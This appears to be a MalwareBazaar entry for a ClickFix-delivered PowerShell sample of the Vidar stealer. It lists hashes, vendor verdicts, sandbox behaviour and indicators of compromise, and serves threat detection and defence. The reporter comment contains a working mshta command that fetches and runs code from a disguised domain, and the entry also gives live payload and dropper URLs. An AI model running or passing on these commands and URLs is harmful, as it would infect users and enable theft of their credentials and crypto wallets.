MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 3855e15e8ccc5defba674ad44fe84618524e61516502a4bd7ccaaf6b209642bb. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry



Vidar


Vendor detections: 9


Intelligence 9 IOCs YARA 1 File information Comments

SHA256 hash: 3855e15e8ccc5defba674ad44fe84618524e61516502a4bd7ccaaf6b209642bb
SHA3-384 hash: 12d4caf9ae3a31cbd09666f055fafc5cf50ff3af10d6c4744eee8cbbdaebe970dd3b7805da8cbc2e54cd77f5b2f36a9b
SHA1 hash: 7c2cebd51bf266b5c577f96d99c2611c1e33314f
MD5 hash: 657bc0b7650e5a675cd7b293766fbdb5
humanhash: cardinal-robert-gee-eleven
File name:over.ps1
Download: download sample
Signature Vidar
File size:1'245 bytes
First seen:2024-12-31 15:57:14 UTC
Last seen:Never
File type:PowerShell (PS) ps1
MIME type:text/plain
ssdeep 24:xvMMG/WqHWtmr97H5elXz4+FaRxYztt6uwhQotAXhQuuwUnYk:pfnq289VelD4+FcGt6uwKotA6Ydk
TLSH T1ED21FE2B292C0A16C1F55158FB116585EFB3D12783179D24B8FCD648AF615BC8234E9A
Magika powershell
Reporter aachum
Tags:ClickFix ps1 vidar


Avatar
iamaachum
mshta https://microsoft-dns-reload-7m.pages.dev # "Microsoft Windows: DNS service Reload and Restart UP => https://raw.githubusercontent.com/rk2026/civil/refs/heads/main/over.txt

Affected websites:
https://smartgrasmatta.se/
https://imperioautovidros.com.br/
https://shellcorp.kitendart.tech/

C2: sdoout.lol

Intelligence


File Origin
# of uploads :
1
# of downloads :
163
Origin country :
ES ES
Vendor Threat Intelligence
Verdict:
Malicious
Score:
97.4%
Tags:
autoit emotet
Verdict:
Likely Malicious
Threat level:
  7.5/10
Confidence:
100%
Tags:
fingerprint packed
Result
Verdict:
MALICIOUS
Result
Threat name:
Detection:
malicious
Classification:
troj.spyw.expl.evad
Score:
100 / 100
Signature
AI detected suspicious sample
Antivirus detection for URL or domain
Attempt to bypass Chrome Application-Bound Encryption
Drops PE files with a suspicious file extension
Monitors registry run keys for changes
Multi AV Scanner detection for dropped file
Powershell drops PE file
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Yara detected Vidar stealer
Behaviour
Behavior Graph:
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1582851 Sample: over.ps1 Startdate: 31/12/2024 Architecture: WINDOWS Score: 100 86 sdoout.lol 2->86 88 saaadnesss.shop 2->88 90 4 other IPs or domains 2->90 120 Suricata IDS alerts for network traffic 2->120 122 Antivirus detection for URL or domain 2->122 124 Yara detected Vidar stealer 2->124 126 3 other signatures 2->126 11 powershell.exe 14 27 2->11         started        16 msedge.exe 2->16         started        18 svchost.exe 2->18         started        20 msedge.exe 2->20         started        signatures3 process4 dnsIp5 98 saaadnesss.shop 185.121.235.167, 443, 49706 IPCORE-ASES Spain 11->98 100 raw.githubusercontent.com 185.199.109.133, 443, 49704 FASTLYUS Netherlands 11->100 102 ifconfig.me 34.160.111.145, 443, 49705 ATGS-MMD-ASUS United States 11->102 80 C:\Users\user\AppData\...\hyf04rot.rhn.exe, PE32 11->80 dropped 82 C:\Users\user\AppData\...\l2xn2zg1.cmdline, Unicode 11->82 dropped 134 Powershell drops PE file 11->134 22 hyf04rot.rhn.exe 26 11->22         started        25 csc.exe 3 11->25         started        28 conhost.exe 11->28         started        30 msedge.exe 16->30         started        33 msedge.exe 16->33         started        35 msedge.exe 16->35         started        104 127.0.0.1 unknown unknown 18->104 84 C:\ProgramData\Microsoft84etwork\...\qmgr.jfm, DOS 18->84 dropped 37 msedge.exe 20->37         started        file6 signatures7 process8 dnsIp9 128 Multi AV Scanner detection for dropped file 22->128 39 cmd.exe 2 22->39         started        78 C:\Users\user\AppData\Local\...\l2xn2zg1.dll, PE32 25->78 dropped 43 cvtres.exe 1 25->43         started        114 104.46.162.225, 443, 50077, 50104 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 30->114 116 20.110.205.119, 443, 50076, 50095 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 30->116 118 19 other IPs or domains 30->118 file10 signatures11 process12 file13 76 C:\Users\user\AppData\Local\...\Stopped.com, PE32 39->76 dropped 132 Drops PE files with a suspicious file extension 39->132 45 Stopped.com 29 39->45         started        49 cmd.exe 1 39->49         started        51 cmd.exe 2 39->51         started        53 9 other processes 39->53 signatures14 process15 dnsIp16 110 sdoout.lol 116.203.14.4, 443, 49804, 49812 HETZNER-ASDE Germany 45->110 112 t.me 149.154.167.99, 443, 49796 TELEGRAMRU United Kingdom 45->112 136 Attempt to bypass Chrome Application-Bound Encryption 45->136 138 Tries to harvest and steal ftp login credentials 45->138 140 Tries to harvest and steal browser information (history, passwords, etc) 45->140 142 Tries to steal Crypto Currency Wallets 45->142 55 msedge.exe 45->55         started        58 msedge.exe 45->58         started        60 chrome.exe 45->60         started        63 cmd.exe 45->63         started        signatures17 process18 dnsIp19 130 Monitors registry run keys for changes 55->130 65 msedge.exe 55->65         started        67 msedge.exe 58->67         started        106 192.168.2.5, 443, 49329, 49396 unknown unknown 60->106 108 239.255.255.250 unknown Reserved 60->108 69 chrome.exe 60->69         started        72 conhost.exe 63->72         started        74 timeout.exe 63->74         started        signatures20 process21 dnsIp22 92 plus.l.google.com 142.250.184.206, 443, 49907 GOOGLEUS United States 69->92 94 www.google.com 142.250.184.228, 443, 49876, 49880 GOOGLEUS United States 69->94 96 2 other IPs or domains 69->96
Threat name:
Script-PowerShell.Trojan.Vidar
Status:
Malicious
First seen:
2024-12-30 21:15:14 UTC
File Type:
Text (PowerShell)
AV detection:
6 of 38 (15.79%)
Threat level:
  5/5
Result
Malware family:
n/a
Score:
  10/10
Tags:
discovery execution
Behaviour
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Command and Scripting Interpreter: PowerShell
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Drops file in Windows directory
Enumerates processes with tasklist
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
Checks computer location settings
Executes dropped EXE
Blocklisted process makes network request
Downloads MZ/PE file
Malware Config
Dropper Extraction:
https://raw.githubusercontent.com/rk2026/civil/refs/heads/main/MatAugust.exe
Please note that we are no longer able to provide a coverage score for Virus Total.

YARA Signatures


MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name:detect_powershell
Author:daniyyell
Description:Detects suspicious PowerShell activity related to malware execution

File information


The table below shows additional information about this malware sample such as delivery method and external references.

Web download

Vidar

PowerShell (PS) ps1 3855e15e8ccc5defba674ad44fe84618524e61516502a4bd7ccaaf6b209642bb

(this sample)

  
Delivery method
Distributed via web download

Comments